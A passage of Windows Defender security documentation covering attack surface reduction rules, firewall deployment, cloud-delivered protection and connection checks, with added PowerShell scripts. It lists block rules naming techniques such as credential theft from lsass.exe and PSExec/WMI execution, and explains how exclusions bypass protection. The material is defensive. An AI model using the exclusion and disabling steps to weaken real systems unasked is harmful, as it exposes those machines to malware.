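As an added example (not code from the documentation), the script below keeps the rule-to-action mapping in one table, applies it with Add-MpPreference so rules already configured on the machine are kept, reports drift between the desired and the reported state, renders the same table in the OMA-URI value format the MDM section shows, and appends exclusions with Add-MpPreference rather than Set-MpPreference. The GUIDs are rule IDs listed on this page; the action chosen for each rule and the exclusion path are assumptions for illustration.

```powershell
# Added example (not from the original documentation). Rule IDs are the GUIDs listed
# on this page; the action assigned to each rule is illustrative.
$DesiredAsrState = [ordered]@{
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Enabled'    # Office apps creating child processes
    '3B576869-A4EC-4529-8536-B80A7769E899' = 'Enabled'    # Office apps creating executable content
    '75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84' = 'AuditMode'  # Office apps injecting into other processes
    'D3E037E1-3EB8-44C8-A917-57927947596D' = 'Enabled'    # JS/VBScript launching downloaded executables
    '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC' = 'AuditMode'  # potentially obfuscated scripts
    'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550' = 'Enabled'    # executable content from email client and webmail
}

# Action names accepted by Set-/Add-MpPreference and the numeric codes Get-MpPreference
# reports (the same 0/1/2 values the MDM CSP and Group Policy use).
$AsrActionCode = @{ Disabled = 0; Enabled = 1; AuditMode = 2 }

function Set-AsrDesiredState {
    param([System.Collections.IDictionary]$Desired = $DesiredAsrState)
    # Add-MpPreference merges with the existing rule list; Set-MpPreference would discard
    # every rule not named in this call.
    Add-MpPreference -AttackSurfaceReductionRules_Ids @($Desired.Keys) `
                     -AttackSurfaceReductionRules_Actions @($Desired.Values)
}

function Get-AsrDrift {
    param([System.Collections.IDictionary]$Desired = $DesiredAsrState)
    # Compare what Get-MpPreference reports with the desired table; rules missing from the
    # machine are reported with an Actual of 'NotConfigured'. An empty result means no drift.
    $pref    = Get-MpPreference
    $ids     = @($pref.AttackSurfaceReductionRules_Ids | Where-Object { $_ })
    $actions = @($pref.AttackSurfaceReductionRules_Actions)
    $actual  = @{}
    for ($i = 0; $i -lt $ids.Count; $i++) { $actual[$ids[$i].ToUpperInvariant()] = [int]$actions[$i] }
    foreach ($entry in $Desired.GetEnumerator()) {
        $key  = $entry.Key.ToUpperInvariant()
        $want = $AsrActionCode[$entry.Value]
        $have = if ($actual.ContainsKey($key)) { $actual[$key] } else { 'NotConfigured' }
        if ("$have" -ne "$want") {
            [pscustomobject]@{ RuleId = $entry.Key; Desired = $want; Actual = $have }
        }
    }
}

function ConvertTo-AsrOmaUriValue {
    param([System.Collections.IDictionary]$Desired = $DesiredAsrState)
    # The same table rendered for ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionRules:
    # {GUID}=code entries joined by '|' with no spaces, as the MDM section requires.
    @($Desired.GetEnumerator() | ForEach-Object { "{$($_.Key)}=$($AsrActionCode[$_.Value])" }) -join '|'
}

function Add-AsrExclusion {
    param([Parameter(Mandatory)] [string[]]$Path)
    # Exclusions apply to every rule that honours them; Add- appends, Set- would overwrite the list.
    Add-MpPreference -AttackSurfaceReductionOnlyExclusions $Path
}

# Run from an elevated session; the exclusion path is a placeholder.
Set-AsrDesiredState
Get-AsrDrift | Format-Table -AutoSize
ConvertTo-AsrOmaUriValue
# Add-AsrExclusion -Path 'C:\LOB\App\legacytool.exe'
```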

Related topics
Reduce attack surfaces with attack surface reduction rules
Evaluate attack surface reduction
Enable cloud-delivered protection
Customize attack surface reduction rules
4/26/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Attack surface reduction rules help prevent actions and apps that are typically used by exploit-seeking malware to
infect machines. Attack surface reduction rules are supported on Windows Server 2019 as well as Windows 10
clients.
This topic describes how to customize attack surface reduction rules by excluding files and folders or adding
custom text to the notification alert that appears on a user's computer.
You can use Group Policy, PowerShell, and MDM CSPs to configure these settings.

Exclude files and folders


You can exclude files and folders from being evaluated by all attack surface reduction rules. This means that even if
the file or folder contains malicious behavior as determined by an attack surface reduction rule, the file will not be
blocked from running.
This could potentially allow unsafe files to run and infect your devices.

WARNING
Excluding files or folders can severely reduce the protection provided by attack surface reduction rules. Files that would have
been blocked by a rule will be allowed to run, and there will be no report or event recorded.
If you are encountering problems with rules detecting files that you believe should not be detected, you should use audit
mode first to test the rule.

You can specify individual files or folders (using folder paths or fully qualified resource names) but you cannot
specify if the exclusions should only be applied to individual rules: the exclusions will apply to all rules that are
enabled (or placed in audit mode) and that allow exclusions.
Attack surface reduction supports environment variables and wildcards. For information about using wildcards, see
Use wildcards in the file name and folder path or extension exclusion lists.
Exclusions apply to all attack surface reduction rules.

RULE DESCRIPTION | GUID
Block all Office applications from creating child processes | D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Block execution of potentially obfuscated scripts | 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC
Block Win32 API calls from Office macro | 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B
Block Office applications from creating executable content | 3B576869-A4EC-4529-8536-B80A7769E899
Block Office applications from injecting code into other processes | 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84
Block JavaScript or VBScript from launching downloaded executable content | D3E037E1-3EB8-44C8-A917-57927947596D
Block executable content from email client and webmail | BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550
Block executable files from running unless they meet a prevalence, age, or trusted list criteria | 01443614-cd74-433a-b99e-2ecdc07bfc25
Use advanced protection against ransomware | c1db55ab-c21a-4637-bb3f-a12568109d35
Block credential stealing from the Windows local security authority subsystem (lsass.exe) | 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2
Block process creations originating from PSExec and WMI commands | d1e49aac-8f56-4280-b9ba-993a6d77406c
Block untrusted and unsigned processes that run from USB | b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4
Block Office communication applications from creating child processes | 26190899-1602-49e8-8b27-eb1d0a1ce869
Block Adobe Reader from creating child processes | 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c

See the attack surface reduction topic for details on each rule.
Use Group Policy to exclude files and folders
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > Windows Defender
Exploit Guard > Attack surface reduction.
4. Double-click the Exclude files and paths from Attack surface reduction Rules setting and set the option
to Enabled. Click Show and enter each file or folder in the Value name column. Enter 0 in the Value
column for each item.
Use PowerShell to exclude files and folders
1. Type powershell in the Start menu, right-click Windows PowerShell and click Run as administrator
2. Enter the following cmdlet:

Add-MpPreference -AttackSurfaceReductionOnlyExclusions "<fully qualified path or resource>"

Continue to use Add-MpPreference -AttackSurfaceReductionOnlyExclusions to add more folders to the list.


IMPORTANT
Use Add-MpPreference to append or add apps to the list. Using the Set-MpPreference cmdlet will overwrite the existing
list.

Use MDM CSPs to exclude files and folders


Use the ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionOnlyExclusions configuration service
provider (CSP) to add exclusions.

Customize the notification


See the Windows Security topic for more information about customizing the notification when a rule is triggered
and blocks an app or file.

Related topics
Reduce attack surfaces with attack surface reduction rules
Enable attack surface reduction rules
Evaluate attack surface reduction rules
Windows Defender Firewall with Advanced Security Deployment Guide
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
You can use the Windows Defender Firewall with Advanced Security MMC snap-in with devices running at least
Windows Vista or Windows Server 2008 to help protect the devices and the data that they share across a network.
You can use Windows Defender Firewall to control access to the device from the network. You can create rules that
allow or block network traffic in either direction based on your business requirements. You can also create IPsec
connection security rules to help protect your data as it travels across the network from device to device.

About this guide


This guide is intended for use by system administrators and system engineers. It provides detailed guidance for
deploying a Windows Defender Firewall with Advanced Security design that you or an infrastructure specialist or
system architect in your organization has selected.
Begin by reviewing the information in Planning to Deploy Windows Defender Firewall with Advanced Security.
If you have not yet selected a design, we recommend that you wait to follow the instructions in this guide until
after you have reviewed the design options in the Windows Defender Firewall with Advanced Security Design
Guide and selected the one most appropriate for your organization.
After you select your design and gather the required information about the zones (isolation, boundary, and
encryption), operating systems to support, and other details, you can then use this guide to deploy your Windows
Defender Firewall with Advanced Security design in your production environment. This guide provides steps for
deploying any of the following primary designs that are described in the Design Guide:
Basic Firewall Policy Design
Domain Isolation Policy Design
Server Isolation Policy Design
Certificate-based Isolation Policy Design
Use the checklists in Implementing Your Windows Defender Firewall with Advanced Security Design Plan to
determine how best to use the instructions in this guide to deploy your particular design.

Caution: We recommend that you use the techniques documented in this guide only for GPOs that must be
deployed to the majority of the devices in your organization, and only when the OU hierarchy in your Active
Directory domain does not match the deployment needs of these GPOs. These characteristics are typical of
GPOs for server and domain isolation scenarios, but are not typical of most other GPOs. When the OU
hierarchy supports it, deploy a GPO by linking it to the lowest level OU that contains all of the accounts to
which the GPO applies.

In a large enterprise environment with hundreds or thousands of GPOs, using this technique with too many GPOs
can result in user or device accounts that are members of an excessive number of groups; this can result in
network connectivity problems if network protocol limits are exceeded.

What this guide does not provide


This guide does not provide:
Guidance for creating firewall rules for specific network applications. For this information, see Planning
Settings for a Basic Firewall Policy in the Windows Defender Firewall with Advanced Security Design
Guide.
Guidance for setting up Active Directory Domain Services (AD DS) to support Group Policy.
Guidance for setting up certification authorities (CAs) to create certificates for certificate-based
authentication.

Overview of Windows Defender Firewall with Advanced Security


Windows Defender Firewall in Windows 8, Windows 7, Windows Vista, Windows Server 2012, Windows Server
2008, and Windows Server 2008 R2 is a stateful host firewall that helps secure the device by allowing you to
create rules that determine which network traffic is permitted to enter the device from the network and which
network traffic the device is allowed to send to the network. Windows Defender Firewall also supports Internet
Protocol security (IPsec), which you can use to require authentication from any device that is attempting to
communicate with your device. When authentication is required, devices that cannot be authenticated as a trusted
device cannot communicate with your device. You can also use IPsec to require that certain network traffic is
encrypted to prevent it from being read by network packet analyzers that could be attached to the network by a
malicious user.
The Windows Defender Firewall with Advanced Security MMC snap-in is more flexible and provides much more
functionality than the consumer-friendly Windows Defender Firewall interface found in the Control Panel. Both
interfaces interact with the same underlying services, but provide different levels of control over those services.
While the Windows Defender Firewall Control Panel program can protect a single device in a home environment,
it does not provide enough centralized management or security features to help secure more complex network
traffic found in a typical business enterprise environment.
For more information about Windows Defender Firewall with Advanced Security, see Windows Defender Firewall
with Advanced Security Overview.
Configure Windows Defender Antivirus features
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can configure Windows Defender Antivirus with a number of tools, including:
Microsoft Intune
System Center Configuration Manager
Group Policy
PowerShell cmdlets
Windows Management Instrumentation (WMI)
The following broad categories of features can be configured:
Cloud-delivered protection
Always-on real-time protection, including behavioral, heuristic, and machine-learning-based protection
How end-users interact with the client on individual endpoints
The topics in this section describe how to perform key tasks when configuring Windows Defender Antivirus. Each
topic includes instructions for the applicable configuration tool (or tools).
You can also review the Reference topics for management and configuration tools topic for an overview of each
tool and links to further help.

In this section
Utilize Microsoft cloud-provided Windows Defender Antivirus protection
  Cloud-delivered protection provides an advanced level of fast, robust antivirus detection.

Configure behavioral, heuristic, and real-time protection
  Enable behavior-based, heuristic, and real-time antivirus protection.

Configure end-user interaction with Windows Defender Antivirus
  Configure how end-users interact with Windows Defender Antivirus, what notifications they see, and whether they can override settings.
Use next-gen technologies in Windows Defender Antivirus through cloud-delivered protection
4/5/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Microsoft next-gen technologies in Windows Defender Antivirus provide near-instant, automated protection
against new and emerging threats. To dynamically identify new threats, these technologies work with large sets of
interconnected data in the Microsoft Intelligent Security Graph and powerful artificial intelligence (AI) systems
driven by advanced machine learning models.
To take advantage of the power and speed of these next-gen technologies, Windows Defender Antivirus works
seamlessly with Microsoft cloud services. These cloud protection services, also referred to as Microsoft Advanced
Protection Service (MAPS), enhance standard real-time protection, providing arguably the best antivirus
defense.

NOTE
The Windows Defender Antivirus cloud service is a mechanism for delivering updated protection to your network and
endpoints. Although it is called a cloud service, it is not simply protection for files stored in the cloud; rather, it uses
distributed resources and machine learning to deliver protection to your endpoints at a rate that is far faster than
traditional Security intelligence updates.

With cloud-delivered protection, next-gen technologies provide rapid identification of new threats, sometimes
even before a single machine is infected. Watch the following video about Microsoft AI and Windows Defender
Antivirus in action:
https://www.microsoft.com/en-us/videoplayer/embed/RE1Yu4B
To understand how next-gen technologies shorten protection delivery time through the cloud, watch the
following video:
https://videoplayercdn.osi.office.net/embed/c2f20f59-ca56-4a7b-ba23-44c60bc62c59
Read the following blog posts for detailed protection stories involving cloud-protection and Microsoft AI:
Why Windows Defender Antivirus is the most deployed in the enterprise
Behavior monitoring combined with machine learning spoils a massive Dofoil coin mining campaign
How artificial intelligence stopped an Emotet outbreak
Detonating a bad rabbit: Windows Defender Antivirus and layered machine learning defenses
Windows Defender Antivirus cloud protection service: Advanced real-time defense against never-before-seen
malware

Get cloud-delivered protection


Cloud-delivered protection is enabled by default. However, you may need to re-enable it if it has been disabled as
part of previous organizational policies.
Organizations running Windows 10 E5, version 1803 can also take advantage of emergency dynamic intelligence
updates, which provide near real-time protection from emerging threats. When you turn cloud-delivered
protection on, we can deliver a fix for a malware issue via the cloud within minutes instead of waiting for the next
update.

TIP
You can also visit the Windows Defender Testground website at demo.wd.microsoft.com to confirm the feature is working
and see how it works.

The following table describes the differences in cloud-delivered protection between recent versions of Windows
and System Center Configuration Manager.

FEATURE: Cloud-protection service label
  Windows 8.1 (Group Policy): Microsoft Advanced Protection Service
  Windows 10, version 1607 (Group Policy): Microsoft Advanced Protection Service
  Windows 10, version 1703 (Group Policy): Cloud-based Protection
  System Center Configuration Manager 2012: NA
  System Center Configuration Manager (Current Branch): Cloud protection service
  Microsoft Intune: Microsoft Advanced Protection Service

FEATURE: Reporting level (MAPS membership level)
  Windows 8.1 (Group Policy): Basic, Advanced
  Windows 10, version 1607 (Group Policy): Advanced
  Windows 10, version 1703 (Group Policy): Advanced
  System Center Configuration Manager 2012: Dependent on Windows version
  System Center Configuration Manager (Current Branch): Dependent on Windows version
  Microsoft Intune: Dependent on Windows version

FEATURE: Cloud block timeout period
  Windows 8.1 (Group Policy): No
  Windows 10, version 1607 (Group Policy): No
  Windows 10, version 1703 (Group Policy): Configurable
  System Center Configuration Manager 2012: Not configurable
  System Center Configuration Manager (Current Branch): Configurable
  Microsoft Intune: Configurable

You can also configure Windows Defender AV to automatically receive new protection updates based on reports
from our cloud service.

In this section
Enable cloud-delivered protection
  You can enable cloud-delivered protection with System Center Configuration Manager, Group Policy, Microsoft Intune, and PowerShell cmdlets.

Specify the cloud-delivered protection level
  You can specify the level of protection offered by the cloud with Group Policy and System Center Configuration Manager. The protection level will affect the amount of information shared with the cloud and how aggressively new files are blocked.

Configure and validate network connections for Windows Defender Antivirus
  There are certain Microsoft URLs that your network and endpoints must be able to connect to for cloud-delivered protection to work effectively. This topic lists the URLs that should be allowed via firewall or network filtering rules, and instructions for confirming your network is properly enrolled in cloud-delivered protection.

Configure the block at first sight feature
  The Block at First Sight feature can block new malware within seconds, without having to wait hours for traditional Security intelligence. You can enable and configure it with System Center Configuration Manager and Group Policy.

Configure the cloud block timeout period
  Windows Defender Antivirus can block suspicious files from running while it queries our cloud-delivered protection service. You can configure the amount of time the file will be prevented from running with System Center Configuration Manager and Group Policy.
Enable cloud-delivered protection
4/5/2019 • 4 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

NOTE
The Windows Defender Antivirus cloud service is a mechanism for delivering updated protection to your network and
endpoints. Although it is called a cloud service, it is not simply protection for files stored in the cloud; rather, it uses
distributed resources and machine learning to deliver protection to your endpoints at a rate that is far faster than
traditional Security intelligence updates.

You can enable or disable Windows Defender Antivirus cloud-delivered protection with Microsoft Intune, System
Center Configuration Manager, Group Policy, PowerShell cmdlets, or on individual clients in the Windows
Security app.
See Use Microsoft cloud-delivered protection for an overview of Windows Defender Antivirus cloud-delivered
protection.
There are specific network-connectivity requirements to ensure your endpoints can connect to the cloud-
delivered protection service. See Configure and validate network connections for more details.

NOTE
In Windows 10, there is no difference between the Basic and Advanced options described in this topic. This is a legacy
distinction and choosing either setting will result in the same level of cloud-delivered protection. There is no difference in
the type or amount of information that is shared. See the Microsoft Privacy Statement for more information on what we
collect.

Use Intune to enable cloud-delivered protection


1. Sign in to the Azure portal.
2. Select All services > Intune.
3. In the Intune pane, select Device configuration > Profiles, and then select the Device restrictions profile
type you want to configure. If you haven't yet created a Device restrictions profile type, or if you want to
create a new one, see Configure device restriction settings in Microsoft Intune.
4. Select Properties, select Settings: Configure, and then select Windows Defender Antivirus.
5. On the Cloud-delivered protection switch, select Enable.
6. In the Prompt users before sample submission dropdown, select Send all data without prompting.
7. In the Submit samples consent dropdown, select one of the following:
Send safe samples automatically
Send all samples automatically
NOTE
Send safe samples automatically option means that most samples will be sent automatically. Files that
are likely to contain personal information will still prompt and require additional confirmation.

WARNING
Setting to Always Prompt will lower the protection state of the device. Setting to Never send means the
Block at First Sight feature will not function.

8. Click OK to exit the Windows Defender Antivirus settings pane, click OK to exit the Device
restrictions pane, and then click Save to save the changes to your Device restrictions profile.
For more information about Intune device profiles, including how to create and configure their settings, see
What are Microsoft Intune device profiles?
Use Configuration Manager to enable cloud-delivered protection:
See How to create and deploy antimalware policies: Cloud-protection service for details on configuring System
Center Configuration Manager (current branch).
Use Group Policy to enable cloud-delivered protection:
1. On your Group Policy management computer, open the Group Policy Management Console, right-click
the Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Administrative templates.
4. Expand the tree to Windows components > Windows Defender Antivirus > MAPS
5. Double-click Join Microsoft MAPS and ensure the option is enabled and set to Basic MAPS or
Advanced MAPS. Click OK.
6. Double-click Send file samples when further analysis is required and ensure the option is set to
Enabled and the additional options are either of the following:
a. Send safe samples (1)
b. Send all samples (3)

NOTE
Send safe samples automatically option means that most samples will be sent automatically. Files that
are likely to contain personal information will still prompt and require additional confirmation.

WARNING
Setting to 0 (Always Prompt) will lower the protection state of the device. Setting to 2 (Never send) means
the Block at First Sight feature will not function.

7. Click OK.
Use PowerShell cmdlets to enable cloud-delivered protection:
Use the following cmdlets to enable cloud-delivered protection:
Set-MpPreference -MAPSReporting Advanced
Set-MpPreference -SubmitSamplesConsent SendAllSamples

NOTE
You can also set -SubmitSamplesConsent to SendSafeSamples (1). Setting it to AlwaysPrompt (0) will lower the protection
state of the device, and setting it to NeverSend (2) means the Block at First Sight feature will not function.

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to enable cloud-delivered protection:
Use the Set method of the MSFT_MpPreference class for the following properties:

MAPSReporting
SubmitSamplesConsent

See the following for more information and allowed parameters:


Windows Defender WMIv2 APIs
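The script below is an added example, not code from the original page or from Microsoft. It covers both the PowerShell cmdlet and the WMI route above: it sets MAPSReporting and SubmitSamplesConsent with Set-MpPreference, verifies them with Get-MpPreference, and then reads the same two properties from the MSFT_MpPreference class. The WMI namespace (root\Microsoft\Windows\Defender) and the numeric enum values in the comments are assumptions drawn from the Defender module, not from the page.

```powershell
# Added example (not from the original page): enable cloud-delivered protection and
# confirm the result through both the cmdlets and the MSFT_MpPreference WMI class.

# 1. Join MAPS at the Advanced level and allow automatic sample submission.
#    SubmitSamplesConsent: AlwaysPrompt (0) lowers protection, SendSafeSamples (1),
#    NeverSend (2) disables block at first sight, SendAllSamples (3).
Set-MpPreference -MAPSReporting Advanced
Set-MpPreference -SubmitSamplesConsent SendSafeSamples

# 2. Read back through the cmdlet. Numeric value assumed: MAPSReporting 2 = Advanced.
$pref = Get-MpPreference
$enabled = ($pref.MAPSReporting -eq 2) -and ($pref.SubmitSamplesConsent -in 1, 3)
if ($enabled) {
    "Cloud-delivered protection enabled (MAPSReporting={0}, SubmitSamplesConsent={1})" -f `
        $pref.MAPSReporting, $pref.SubmitSamplesConsent
} else {
    Write-Warning ("Not fully enabled: MAPSReporting={0} SubmitSamplesConsent={1}" -f `
        $pref.MAPSReporting, $pref.SubmitSamplesConsent)
}

# 3. The same properties through WMI. Namespace is an assumption (root\Microsoft\Windows\Defender).
$wmiPref = Get-CimInstance -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference
"WMI view: MAPSReporting={0} SubmitSamplesConsent={1}" -f $wmiPref.MAPSReporting, $wmiPref.SubmitSamplesConsent

# 4. Applying the change through the class's Set method instead of the cmdlet.
#    Set to $true to use this path; the argument names are the property names listed above.
$applyViaWmi = $false
if ($applyViaWmi) {
    Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference `
        -MethodName Set -Arguments @{ MAPSReporting = [byte]2; SubmitSamplesConsent = [byte]1 }
}
```

Both routes change the same underlying preference, so a Group Policy setting that is enforced on the endpoint will still override whatever this script sets once policy is refreshed.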
Enable cloud-delivered protection on individual clients with the Windows Security app

NOTE
If the Configure local setting override for reporting Microsoft MAPS Group Policy setting is set to Disabled, then
the Cloud-based protection setting in Windows Settings will be greyed-out and unavailable. Changes made through a
Group Policy Object must first be deployed to individual endpoints before the setting will be updated in Windows Settings.

1. Open the Windows Security app by clicking the shield icon in the task bar or searching the start menu for
Defender.
2. Click the Virus & threat protection tile (or the shield icon on the left menu bar) and then the Virus &
threat protection settings label:
3. Confirm that Cloud-based Protection and Automatic sample submission are switched to On.

NOTE
If automatic sample submission has been configured with Group Policy then the setting will be greyed-out and unavailable.

Related topics
Configure the cloud block timeout period
Configure block at first sight
Use PowerShell cmdlets to manage Windows Defender Antivirus
Help secure Windows PCs with Endpoint Protection for Microsoft Intune
Defender cmdlets
Utilize Microsoft cloud-delivered protection in Windows Defender Antivirus
How to create and deploy antimalware policies: Cloud-protection service
Windows Defender Antivirus in Windows 10
Specify the cloud-delivered protection level
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can specify the level of cloud-protection offered by Windows Defender Antivirus with Group Policy and
System Center Configuration Manager.

NOTE
The Windows Defender Antivirus cloud service is a mechanism for delivering updated protection to your network and
endpoints. Although it is called a cloud service, it is not simply protection for files stored in the cloud; rather, it uses
distributed resources and machine learning to deliver protection to your endpoints at a rate that is far faster than traditional
Security intelligence updates.

Use Intune to specify the level of cloud-delivered protection:


1. Sign in to the Azure portal.
2. Select All services > Intune.
3. In the Intune pane, select Device configuration > Profiles, and then select the Device restrictions profile
type you want to configure. If you haven't yet created a Device restrictions profile type, or if you want to
create a new one, see Configure device restriction settings in Microsoft Intune.
4. Select Properties, select Settings: Configure, and then select Windows Defender Antivirus.
5. On the File Blocking Level switch, select one of the following:
a. High to provide a strong level of detection
b. High + to apply additional protection measures
c. Zero tolerance to block all unknown executables

WARNING
While unlikely, setting this switch to High might cause some legitimate files to be detected. The High +
setting might impact client performance. We recommend you set this to the default level (Not configured).

6. Click OK to exit the Windows Defender Antivirus settings pane, click OK to exit the Device restrictions
pane, and then click Save to save the changes to your Device restrictions profile.
For more information about Intune device profiles, including how to create and configure their settings, see What
are Microsoft Intune device profiles?
Use Configuration Manager to specify the level of cloud-delivered protection:
1. See How to create and deploy antimalware policies: Cloud-protection service for details on configuring System
Center Configuration Manager (current branch).
Use Group Policy to specify the level of cloud-delivered protection:
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Administrative templates.
4. Expand the tree to Windows components > Windows Defender Antivirus > MpEngine.
5. Double-click the Select cloud protection level setting and set it to Enabled. Select the level of
protection:
a. Setting to Default Windows Defender Antivirus blocking level provides strong detection without
increasing the risk of detecting legitimate files.
b. Setting to High blocking level applies a strong level of detection.
c. High + blocking level applies additional protection measures.
d. Zero tolerance blocking level blocks all unknown executables.

WARNING
While unlikely, setting this switch to High might cause some legitimate files to be detected (although you will
have the option to unblock or dispute that detection). The High + setting might impact client performance.
We recommend you set this to the default level (Not configured).

6. Click OK.

Related topics
Windows Defender Antivirus in Windows 10
Enable cloud-delivered protection
How to create and deploy antimalware policies: Cloud-protection service
Configure and validate Windows Defender Antivirus network connections
4/5/2019 • 4 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
To ensure Windows Defender Antivirus cloud-delivered protection works properly, you need to configure your
network to allow connections between your endpoints and certain Microsoft servers.
This topic lists the connections that must be allowed, such as by using firewall rules, and provides instructions for
validating your connection. This will help ensure you receive the best protection from our cloud-delivered
protection services.
See the Enterprise Mobility and Security blog post Important changes to Microsoft Active Protection Services
endpoint for some details about network connectivity.

TIP
You can also visit the Windows Defender ATP demo website at demo.wd.microsoft.com to confirm the following features are
working:
Cloud-delivered protection
Fast learning (including block at first sight)
Potentially unwanted application blocking

Allow connections to the Windows Defender Antivirus cloud service


The Windows Defender Antivirus cloud service provides fast, strong protection for your endpoints. Enabling the
cloud-delivered protection service is optional, however it is highly recommended because it provides very
important protection against malware on your endpoints and across your network.

NOTE
The Windows Defender Antivirus cloud service is a mechanism for delivering updated protection to your network and
endpoints. Although it is called a cloud service, it is not simply protection for files stored in the cloud; rather, it uses
distributed resources and machine learning to deliver protection to your endpoints at a rate that is far faster than traditional
Security intelligence updates.

See Enable cloud-delivered protection for details on enabling the service with Intune, System Center
Configuration Manager, Group Policy, PowerShell cmdlets, or on individual clients in the Windows Security app.
After you've enabled the service, you may need to configure your network or firewall to allow connections
between it and your endpoints.
The following table lists the services and their associated URLs that your network must be able to connect to. You
should ensure there are no firewall or network filtering rules that would deny access to these URLs, or you may
need to create an allow rule specifically for them:
SERVICE: Windows Defender Antivirus cloud-delivered protection service, also referred to as Microsoft Active Protection Service (MAPS)
  DESCRIPTION: Used by Windows Defender Antivirus to provide cloud-delivered protection
  URL: *.wdcp.microsoft.com, *.wdcpalt.microsoft.com, *.wd.microsoft.com

SERVICE: Microsoft Update Service (MU)
  DESCRIPTION: Security intelligence and product updates
  URL: *.update.microsoft.com

SERVICE: Security intelligence updates alternate download location (ADL)
  DESCRIPTION: Alternate location for Windows Defender Antivirus Security intelligence updates if the installed Security intelligence falls out of date (7 or more days behind)
  URL: *.download.microsoft.com

SERVICE: Malware submission storage
  DESCRIPTION: Upload location for files submitted to Microsoft via the Submission form or automatic sample submission
  URL: *.blob.core.windows.net

SERVICE: Certificate Revocation List (CRL)
  DESCRIPTION: Used by Windows when creating the SSL connection to MAPS for updating the CRL
  URL: http://www.microsoft.com/pkiops/crl/, http://www.microsoft.com/pkiops/certs, http://crl.microsoft.com/pki/crl/products, http://www.microsoft.com/pki/certs

SERVICE: Symbol Store
  DESCRIPTION: Used by Windows Defender Antivirus to restore certain critical files during remediation flows
  URL: https://msdl.microsoft.com/download/symbols

SERVICE: Universal Telemetry Client
  DESCRIPTION: Used by Windows to send client diagnostic data; Windows Defender Antivirus uses this for product quality monitoring purposes
  URL: This update uses SSL (TCP Port 443) to download manifests and upload diagnostic data to Microsoft that uses the following DNS endpoints: vortex-win.data.microsoft.com, settings-win.data.microsoft.com

Validate connections between your network and the cloud


After whitelisting the URLs listed above, you can test if you are connected to the Windows Defender Antivirus
cloud service and are correctly reporting and receiving information to ensure you are fully protected.
Use the cmdline tool to validate cloud-delivered protection:
Use the following argument with the Windows Defender Antivirus command line utility (mpcmdrun.exe) to verify
that your network can communicate with the Windows Defender Antivirus cloud service:

MpCmdRun -ValidateMapsConnection

NOTE
You need to open an administrator-level version of the command prompt. Right-click the item in the Start menu, click Run
as administrator and click Yes at the permissions prompt. This command will only work on Windows 10, version 1703 or
higher.

See Manage Windows Defender Antivirus with the mpcmdrun.exe commandline tool for more information on
how to use the mpcmdrun.exe utility.
Attempt to download a fake malware file from Microsoft:
You can download a sample file that Windows Defender Antivirus will detect and block if you are properly
connected to the cloud.
Download the file by visiting the following link:
http://aka.ms/ioavtest

NOTE
This file is not an actual piece of malware. It is a fake file that is designed to test if you are properly connected to the cloud.

If you are properly connected, you will see a warning Windows Defender Antivirus notification:

If you are using Microsoft Edge, you'll also see a notification message:

A similar message occurs if you are using Internet Explorer:

You will also see a detection under Quarantined threats in the Scan history section in the Windows Security
app:
1. Open the Windows Security app by clicking the shield icon in the task bar or searching the start menu for
Defender.
2. Click the Virus & threat protection tile (or the shield icon on the left menu bar) and then the Scan
history label:
3. Under the Quarantined threats section, click the See full history label to see the detected fake malware:
NOTE
Versions of Windows 10 before version 1703 have a different user interface. See Windows Defender Antivirus in the
Windows Security app for more information about the differences between versions, and instructions on how to perform
common tasks in the different interfaces.

The Windows event log will also show Windows Defender client event ID 2050.

IMPORTANT
You will not be able to use a proxy auto-config (.pac) file to test network connections to these URLs. You will need to verify
your proxy servers and any network filtering tools manually to ensure connectivity.
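As an added example (not code from the original page or from Microsoft), the script below combines the validation steps of this topic into one elevated PowerShell run: it executes MpCmdRun -ValidateMapsConnection, tests TCP reachability of the fixed hostnames from the URL table, and looks for the event ID 2050 entry that the fake-malware download should produce. The MpCmdRun.exe location, the choice of representative hostnames and the port per host are assumptions; wildcard entries in the table (for example *.wdcp.microsoft.com) need the concrete FQDNs your proxy logs show.

```powershell
# Added example (not from the original page): validate cloud-delivered protection
# connectivity from an elevated PowerShell prompt.

# 1. MpCmdRun -ValidateMapsConnection (Windows 10, version 1703 or later).
#    Assumed location; platform updates may install MpCmdRun.exe elsewhere.
$mpCmdRun = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'
if (Test-Path $mpCmdRun) {
    & $mpCmdRun -ValidateMapsConnection | Out-Host
    "MpCmdRun exit code: $LASTEXITCODE (0 means the MAPS connection validated)"
} else {
    Write-Warning "MpCmdRun.exe not found at $mpCmdRun"
}

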